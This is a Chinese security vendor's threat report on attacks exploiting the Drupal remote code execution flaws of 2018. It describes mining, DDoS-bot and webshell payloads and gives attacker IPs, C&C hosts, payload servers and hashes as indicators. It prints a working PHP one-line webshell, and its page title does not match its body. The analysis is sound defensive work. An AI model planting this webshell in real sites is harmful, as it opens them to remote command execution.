尊龙凯时

尊龙凯时

尊龙凯时科技

  • 安全产品与方案

    安全产品与方案

  • 基础设施安全

    基础设施安全

  • 数据安全

    数据安全

  • 云计算安全

    云计算安全

  • 工业互联网安全

    工业互联网安全

  • 物联网安全

    物联网安全

  • 信息技术应用创新

    信息技术应用创新

  • 全部产品

    全部产品

  • 全部解决方案

    全部解决方案

基础设施安全

  • 政府

    政府

  • 运营商

    运营商

  • 金融

    金融

  • 能源

    能源

  • 交通

    交通

  • 企业

    企业

  • 科教文卫

    科教文卫

返回列表

KMSpico激活工具木马分析

2017-09-30

发布者:尊龙凯时科技

Drupal远程代码执行漏洞威胁态势分析

一、概述

Drupal官方在2018年3月28日发布sa-core-2018-002 (CVE-2018-7600) Drupal内核远程代码执行漏洞预警,之后一个月内又连续发布两个漏洞,其中包含一个XSS和另一个高危代码执行漏洞sa-core-2018-004 (CVE-2018-7602),此后两个月内互联网上针对Drupal程序的攻击非常频繁,尊龙凯时科技威胁情报中心(NTI)结合安全情报数据,从漏洞披露到利用程序的传播,总结了外界针对Drupal程序的常见攻击手法,对相关态势进行了梳理,希望可以为安全从业人员提供建议和参考。

二、漏洞披露时间轴

虽然漏洞已经披露,相关利用的PoC却在两周后才放出,而仅仅在PoC披露后几个小时,就发现有利用此漏洞的攻击出现。在随后的时间内互联网上针对Drupal程序的攻击迅速增加,在4月29日达到峰值,并且针对该漏洞的攻击还在持续。

在PoC公布的时间轴上,扫描攻击中7.x版本的漏洞触发uri出现频率逐渐多于8.x版本,能看出攻击者的注意力逐渐从8.x版本转移到7.x版本。

下图统计了过去两个月间攻击ip在全球的分布情况,主要集中在北美洲、欧洲以及南美洲等区域,在国家层面上则是以墨西哥、厄瓜多尔、俄罗斯和美国为主要攻击源。

我们关注了发起攻击最频繁的几个ip,发现其中部分ip同时参与多种类型漏洞攻击,比如Weblogic反序列化漏洞(CVE-2017-10271), Struts2-s2045漏洞(CVE-2017-5638)等,除此之外也有相当数量的ip会对内网进行横向扩展实现蠕虫式传播,我们判断此类ip属于僵尸网络的一部分。

三、攻击与利用

根据我们的监控,漏洞公布后不久,网络中迅速出现了三类不同形式的攻击方式:

  • 挖矿利用。攻击者利用漏洞在主机中植入数字货币的挖矿程序,利用主机资源进行挖矿运算。挖矿程序主要针对门罗币,并且同时存在Windows和Linux两个版本;
  • 远控利用。该利用具有命令执行、下载远程文件、tcp/udp flood攻击等功能;
  • Webshell植入。我们捕获的Webshell包括一句话木马,小马和功能强大的大马;

 

在这三类攻击方式中,挖矿利用的手法比较常见,而相关攻击指令和矿池地址也在其他RCE漏洞中出现过,可以判断黑产团伙也在密切关注此类高危漏洞。我们统计了这三类在所有攻击中的占比,其中向受害者主机植入挖矿脚本的占到95%,植入远控类样本占3%,植入网站后门的占1%,还有少部分部分是在目标网站挂上黑页。

挖矿类

在远程代码执行漏洞被披露后,黑产组织向漏洞主机植入挖矿程序,利用系统资源进行挖矿牟利,这类攻击往往走在最前面,而且黑产组织通常会同时发送基于Linux系统和Windows系统的攻击载荷,对不同平台达到相同的攻击目的。

 

  1. Windows平台

         在Windows下攻击者会通过powershell写入vbs脚本并调用wscript下载恶意程序,或者直接通过powershell下载,样本运行后会释放出配置文件,并修改注册表实现自我保护

这条命令是从188.166.148.89下载5_DRUPAL并通过powershell执行

2.Linux平台

         在linux平台下的攻击载荷则是多种多样,例如混合编码,伪装成jpg或者pdf文件等,攻击者会适配x86平台或x64平台,在受害者主机下载相应的挖矿程序,同时写入计划任务保持持久性,最终目的利用系统资源获取数字货币。

例如

wget下载shell脚本

payload经过八进制编码

 

这些样本的行为都是获取门罗币,而在整个漏洞利用过程中,门罗币组织判断有些钱包地址与僵尸网络有关,封停了部分钱包地址。

这期间我们发现了首例利用CVE-2018-7600漏洞蠕虫式传播的僵尸网络Muhstik,并且捕获了多个活跃样本,尊龙凯时威胁情报中心(NTI)分析出该家族样本和C&C之间的关系。

NTI展示Muhstik家族关系

远控类

在漏洞爆发期间,我们监测到利用该漏洞传播的基于IRC协议的DDoS攻击远控脚本,脚本使用perl语言编写,注释中出现了葡萄牙语和西班牙语,我们分析了脚本的功能模块,发现一台C&C主机104.160.176.178,该脚本会根据指令进行命令执行、下载远程文件、tcp/udp flood等攻击

一些指令集

Webshell类

除了在受害者主机植入挖矿程序和远控程序外,远程下载webshell植入网站的也不在少数,而攻击事件表明越来越多的攻击者喜欢使用在线文件/文本分享平台存放webshell或bash脚本,隐藏真正的主机,达到隐匿踪迹的目的。

我们捕获了几类webshell如下,包含一句话木马,小马和功能强大的大马。

 

一句话木马:

if(isset($_REQUEST['c'])) {system( $_REQUEST['c'].'2>&1');}

 

 

我们统计两周内发送该一句话木马的攻击ip及出现次数如下:

IP

出现次数

51.15.135.96

29

58.215.144.205

23

207.148.125.97

21

82.102.20.177

15

59.124.153.166

12

185.244.25.138

8

89.163.190.57

5

82.102.20.230

4

46.243.189.110

4

185.232.65.221

4

138.197.175.247

4

207.246.71.229

3

93.158.215.168

2

82.102.20.171

2

46.243.189.109

2

 

webshell/小马

webshell/大马

四、总结与建议

对此次Drupal内核远程代码执行漏洞事件的跟踪观察中,我们发现

  1. 从漏洞利用细节公布到有效攻击出现,时间窗口非常短暂,留给防御者的时间极其有限。此次事件中,这个时间窗口甚至已经缩短到小时级;
  2. 黑客普遍追求攻陷主机的数量。黑客在漏洞公布后短时间内,迅速开发相关利用工具,通过自动化的扫描与利用,在互联网上广泛地搜集缺陷主机,存在漏洞的网站普遍都存在着被攻陷的风险。因此管理员需要对网站出现的漏洞有足够的重视,第一时间进行升级和修补;
  3. 黑客具有较强的反追踪能力。黑客使用在线文件分享平台来隐匿自己的踪迹,例如pastebin等;

 

防护建议:

  1. 网站管理员应持续关注网站程序相关的漏洞情报,及时更新网站程序,升级防护设备规则;
  2. 管理员要关注网站主机系统资源利用情况,短时间内资源利用骤增且居高不下,需要关注是否被挖矿程序入侵,及时做好备份和清理恶意软件;

五、相关IOC

网络通信

142.44.240.14

145.239.93.215

188.166.148.89:444

217.182.231.56:443

195.22.127.225

104.160.176.178

 

文件服务器

http://94.41.167.11/

http://195.22.126.16/

http://188.166.148.89:53/

http://192.241.247.212/

http://93.174.93.149/

http://198.50.179.109:8020/

 

样本哈希

样本

备注

sha1

xm32.exe

门罗币挖矿

cb00248b8bcd91e68c08a061a91cc3317db5724b

Xm64.exe

门罗币挖矿

8360f0d2df9008240f1d5e0f8acdbd2c98bad58c

Xm32s

门罗币挖矿

fcdd9c19b6b134dc31b3b688002eb51cac76a3ff

xm64s

门罗币挖矿

8822037953274ddd9f78b49ee73185be20e5e3ef

1234567890.pdf

门罗币挖矿

94c2ea3cf1cdb034df2e9aa5779fa0472396bff7 

2sm.txt

远控脚本

d7eb30269b3ba40ef59c0acef8948898fa54895f

maxx2.txt

远控脚本

68efd61193fc9b70394abb2327de2bf6b1f368b7

test.pl

远控脚本

046a9c9838269fc5f76890b141bb39d22e6b9456

wow.txt

远控脚本

c84dc265859d58827369eb25b752b6305b8306e7

K.txt

php webshell

7602c5cbc63e1bf2e484db63c94d5a22b7e17304

wso-encode.php

php webshell

e9e09b90cfdc1cd2ddb867385afa60816a7ee7d5

bash

Muhstik家族

f92f1b03bcc45b692716789387d837905c8d4d76

shy

Muhstik家族

0f4a3e0c6523fe0a0677f91182a1eabc536ff480 

fbsd

Muhstik家族

e6f914790b3888a46dff60f51a98c7191208685a

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

您的信息

*姓名
*联系电话
*邮箱
*所在行业
*所在公司
*验证码
提交到邮箱

<<上一篇

Flexsible技术分析报告-终版(攻击溯源+样本溯源)

>>下一篇

BOTHUNTER-2018年度BOTNET趋势报告

您的联系方式

*姓名
*单位名称
*联系方式
*验证码
提交到邮箱

购买热线

  • 购买咨询:

    400-818-6868-1

提交项目需求

欢迎加入尊龙凯时科技,成为我们的合作伙伴!
  • *请描述您的需求
  • *最终客户名称
  • *项目名称
  • 您感兴趣的产品
  • 项目预算
您的联系方式
  • *姓名
  • *联系电话
  • *邮箱
  • *职务
  • *公司
  • *城市
  • *行业
  • *验证码
  • 提交到邮箱

服务支持

智能客服
智能客服
购买/售后技术问题
盟管家-售后服务系统
盟管家-售后服务系统
在线提单|智能问答|知识库
支持热线
支持热线
400-818-6868
尊龙凯时科技社区
尊龙凯时科技社区
资料下载|在线问答|技术交流
微博
微博

微博

微信
微信

微信

B站
B站

B站

抖音
抖音

抖音

视频号
视频号

视频号

服务热线

400-818-6868

服务时间

7*24小时

© 2024 NSFOCUS 尊龙凯时科技 www.nsfocus.com All Rights Reserved . 京公网安备 11010802021605号 京ICP备14004349号 京ICP证48052245号

尊龙凯时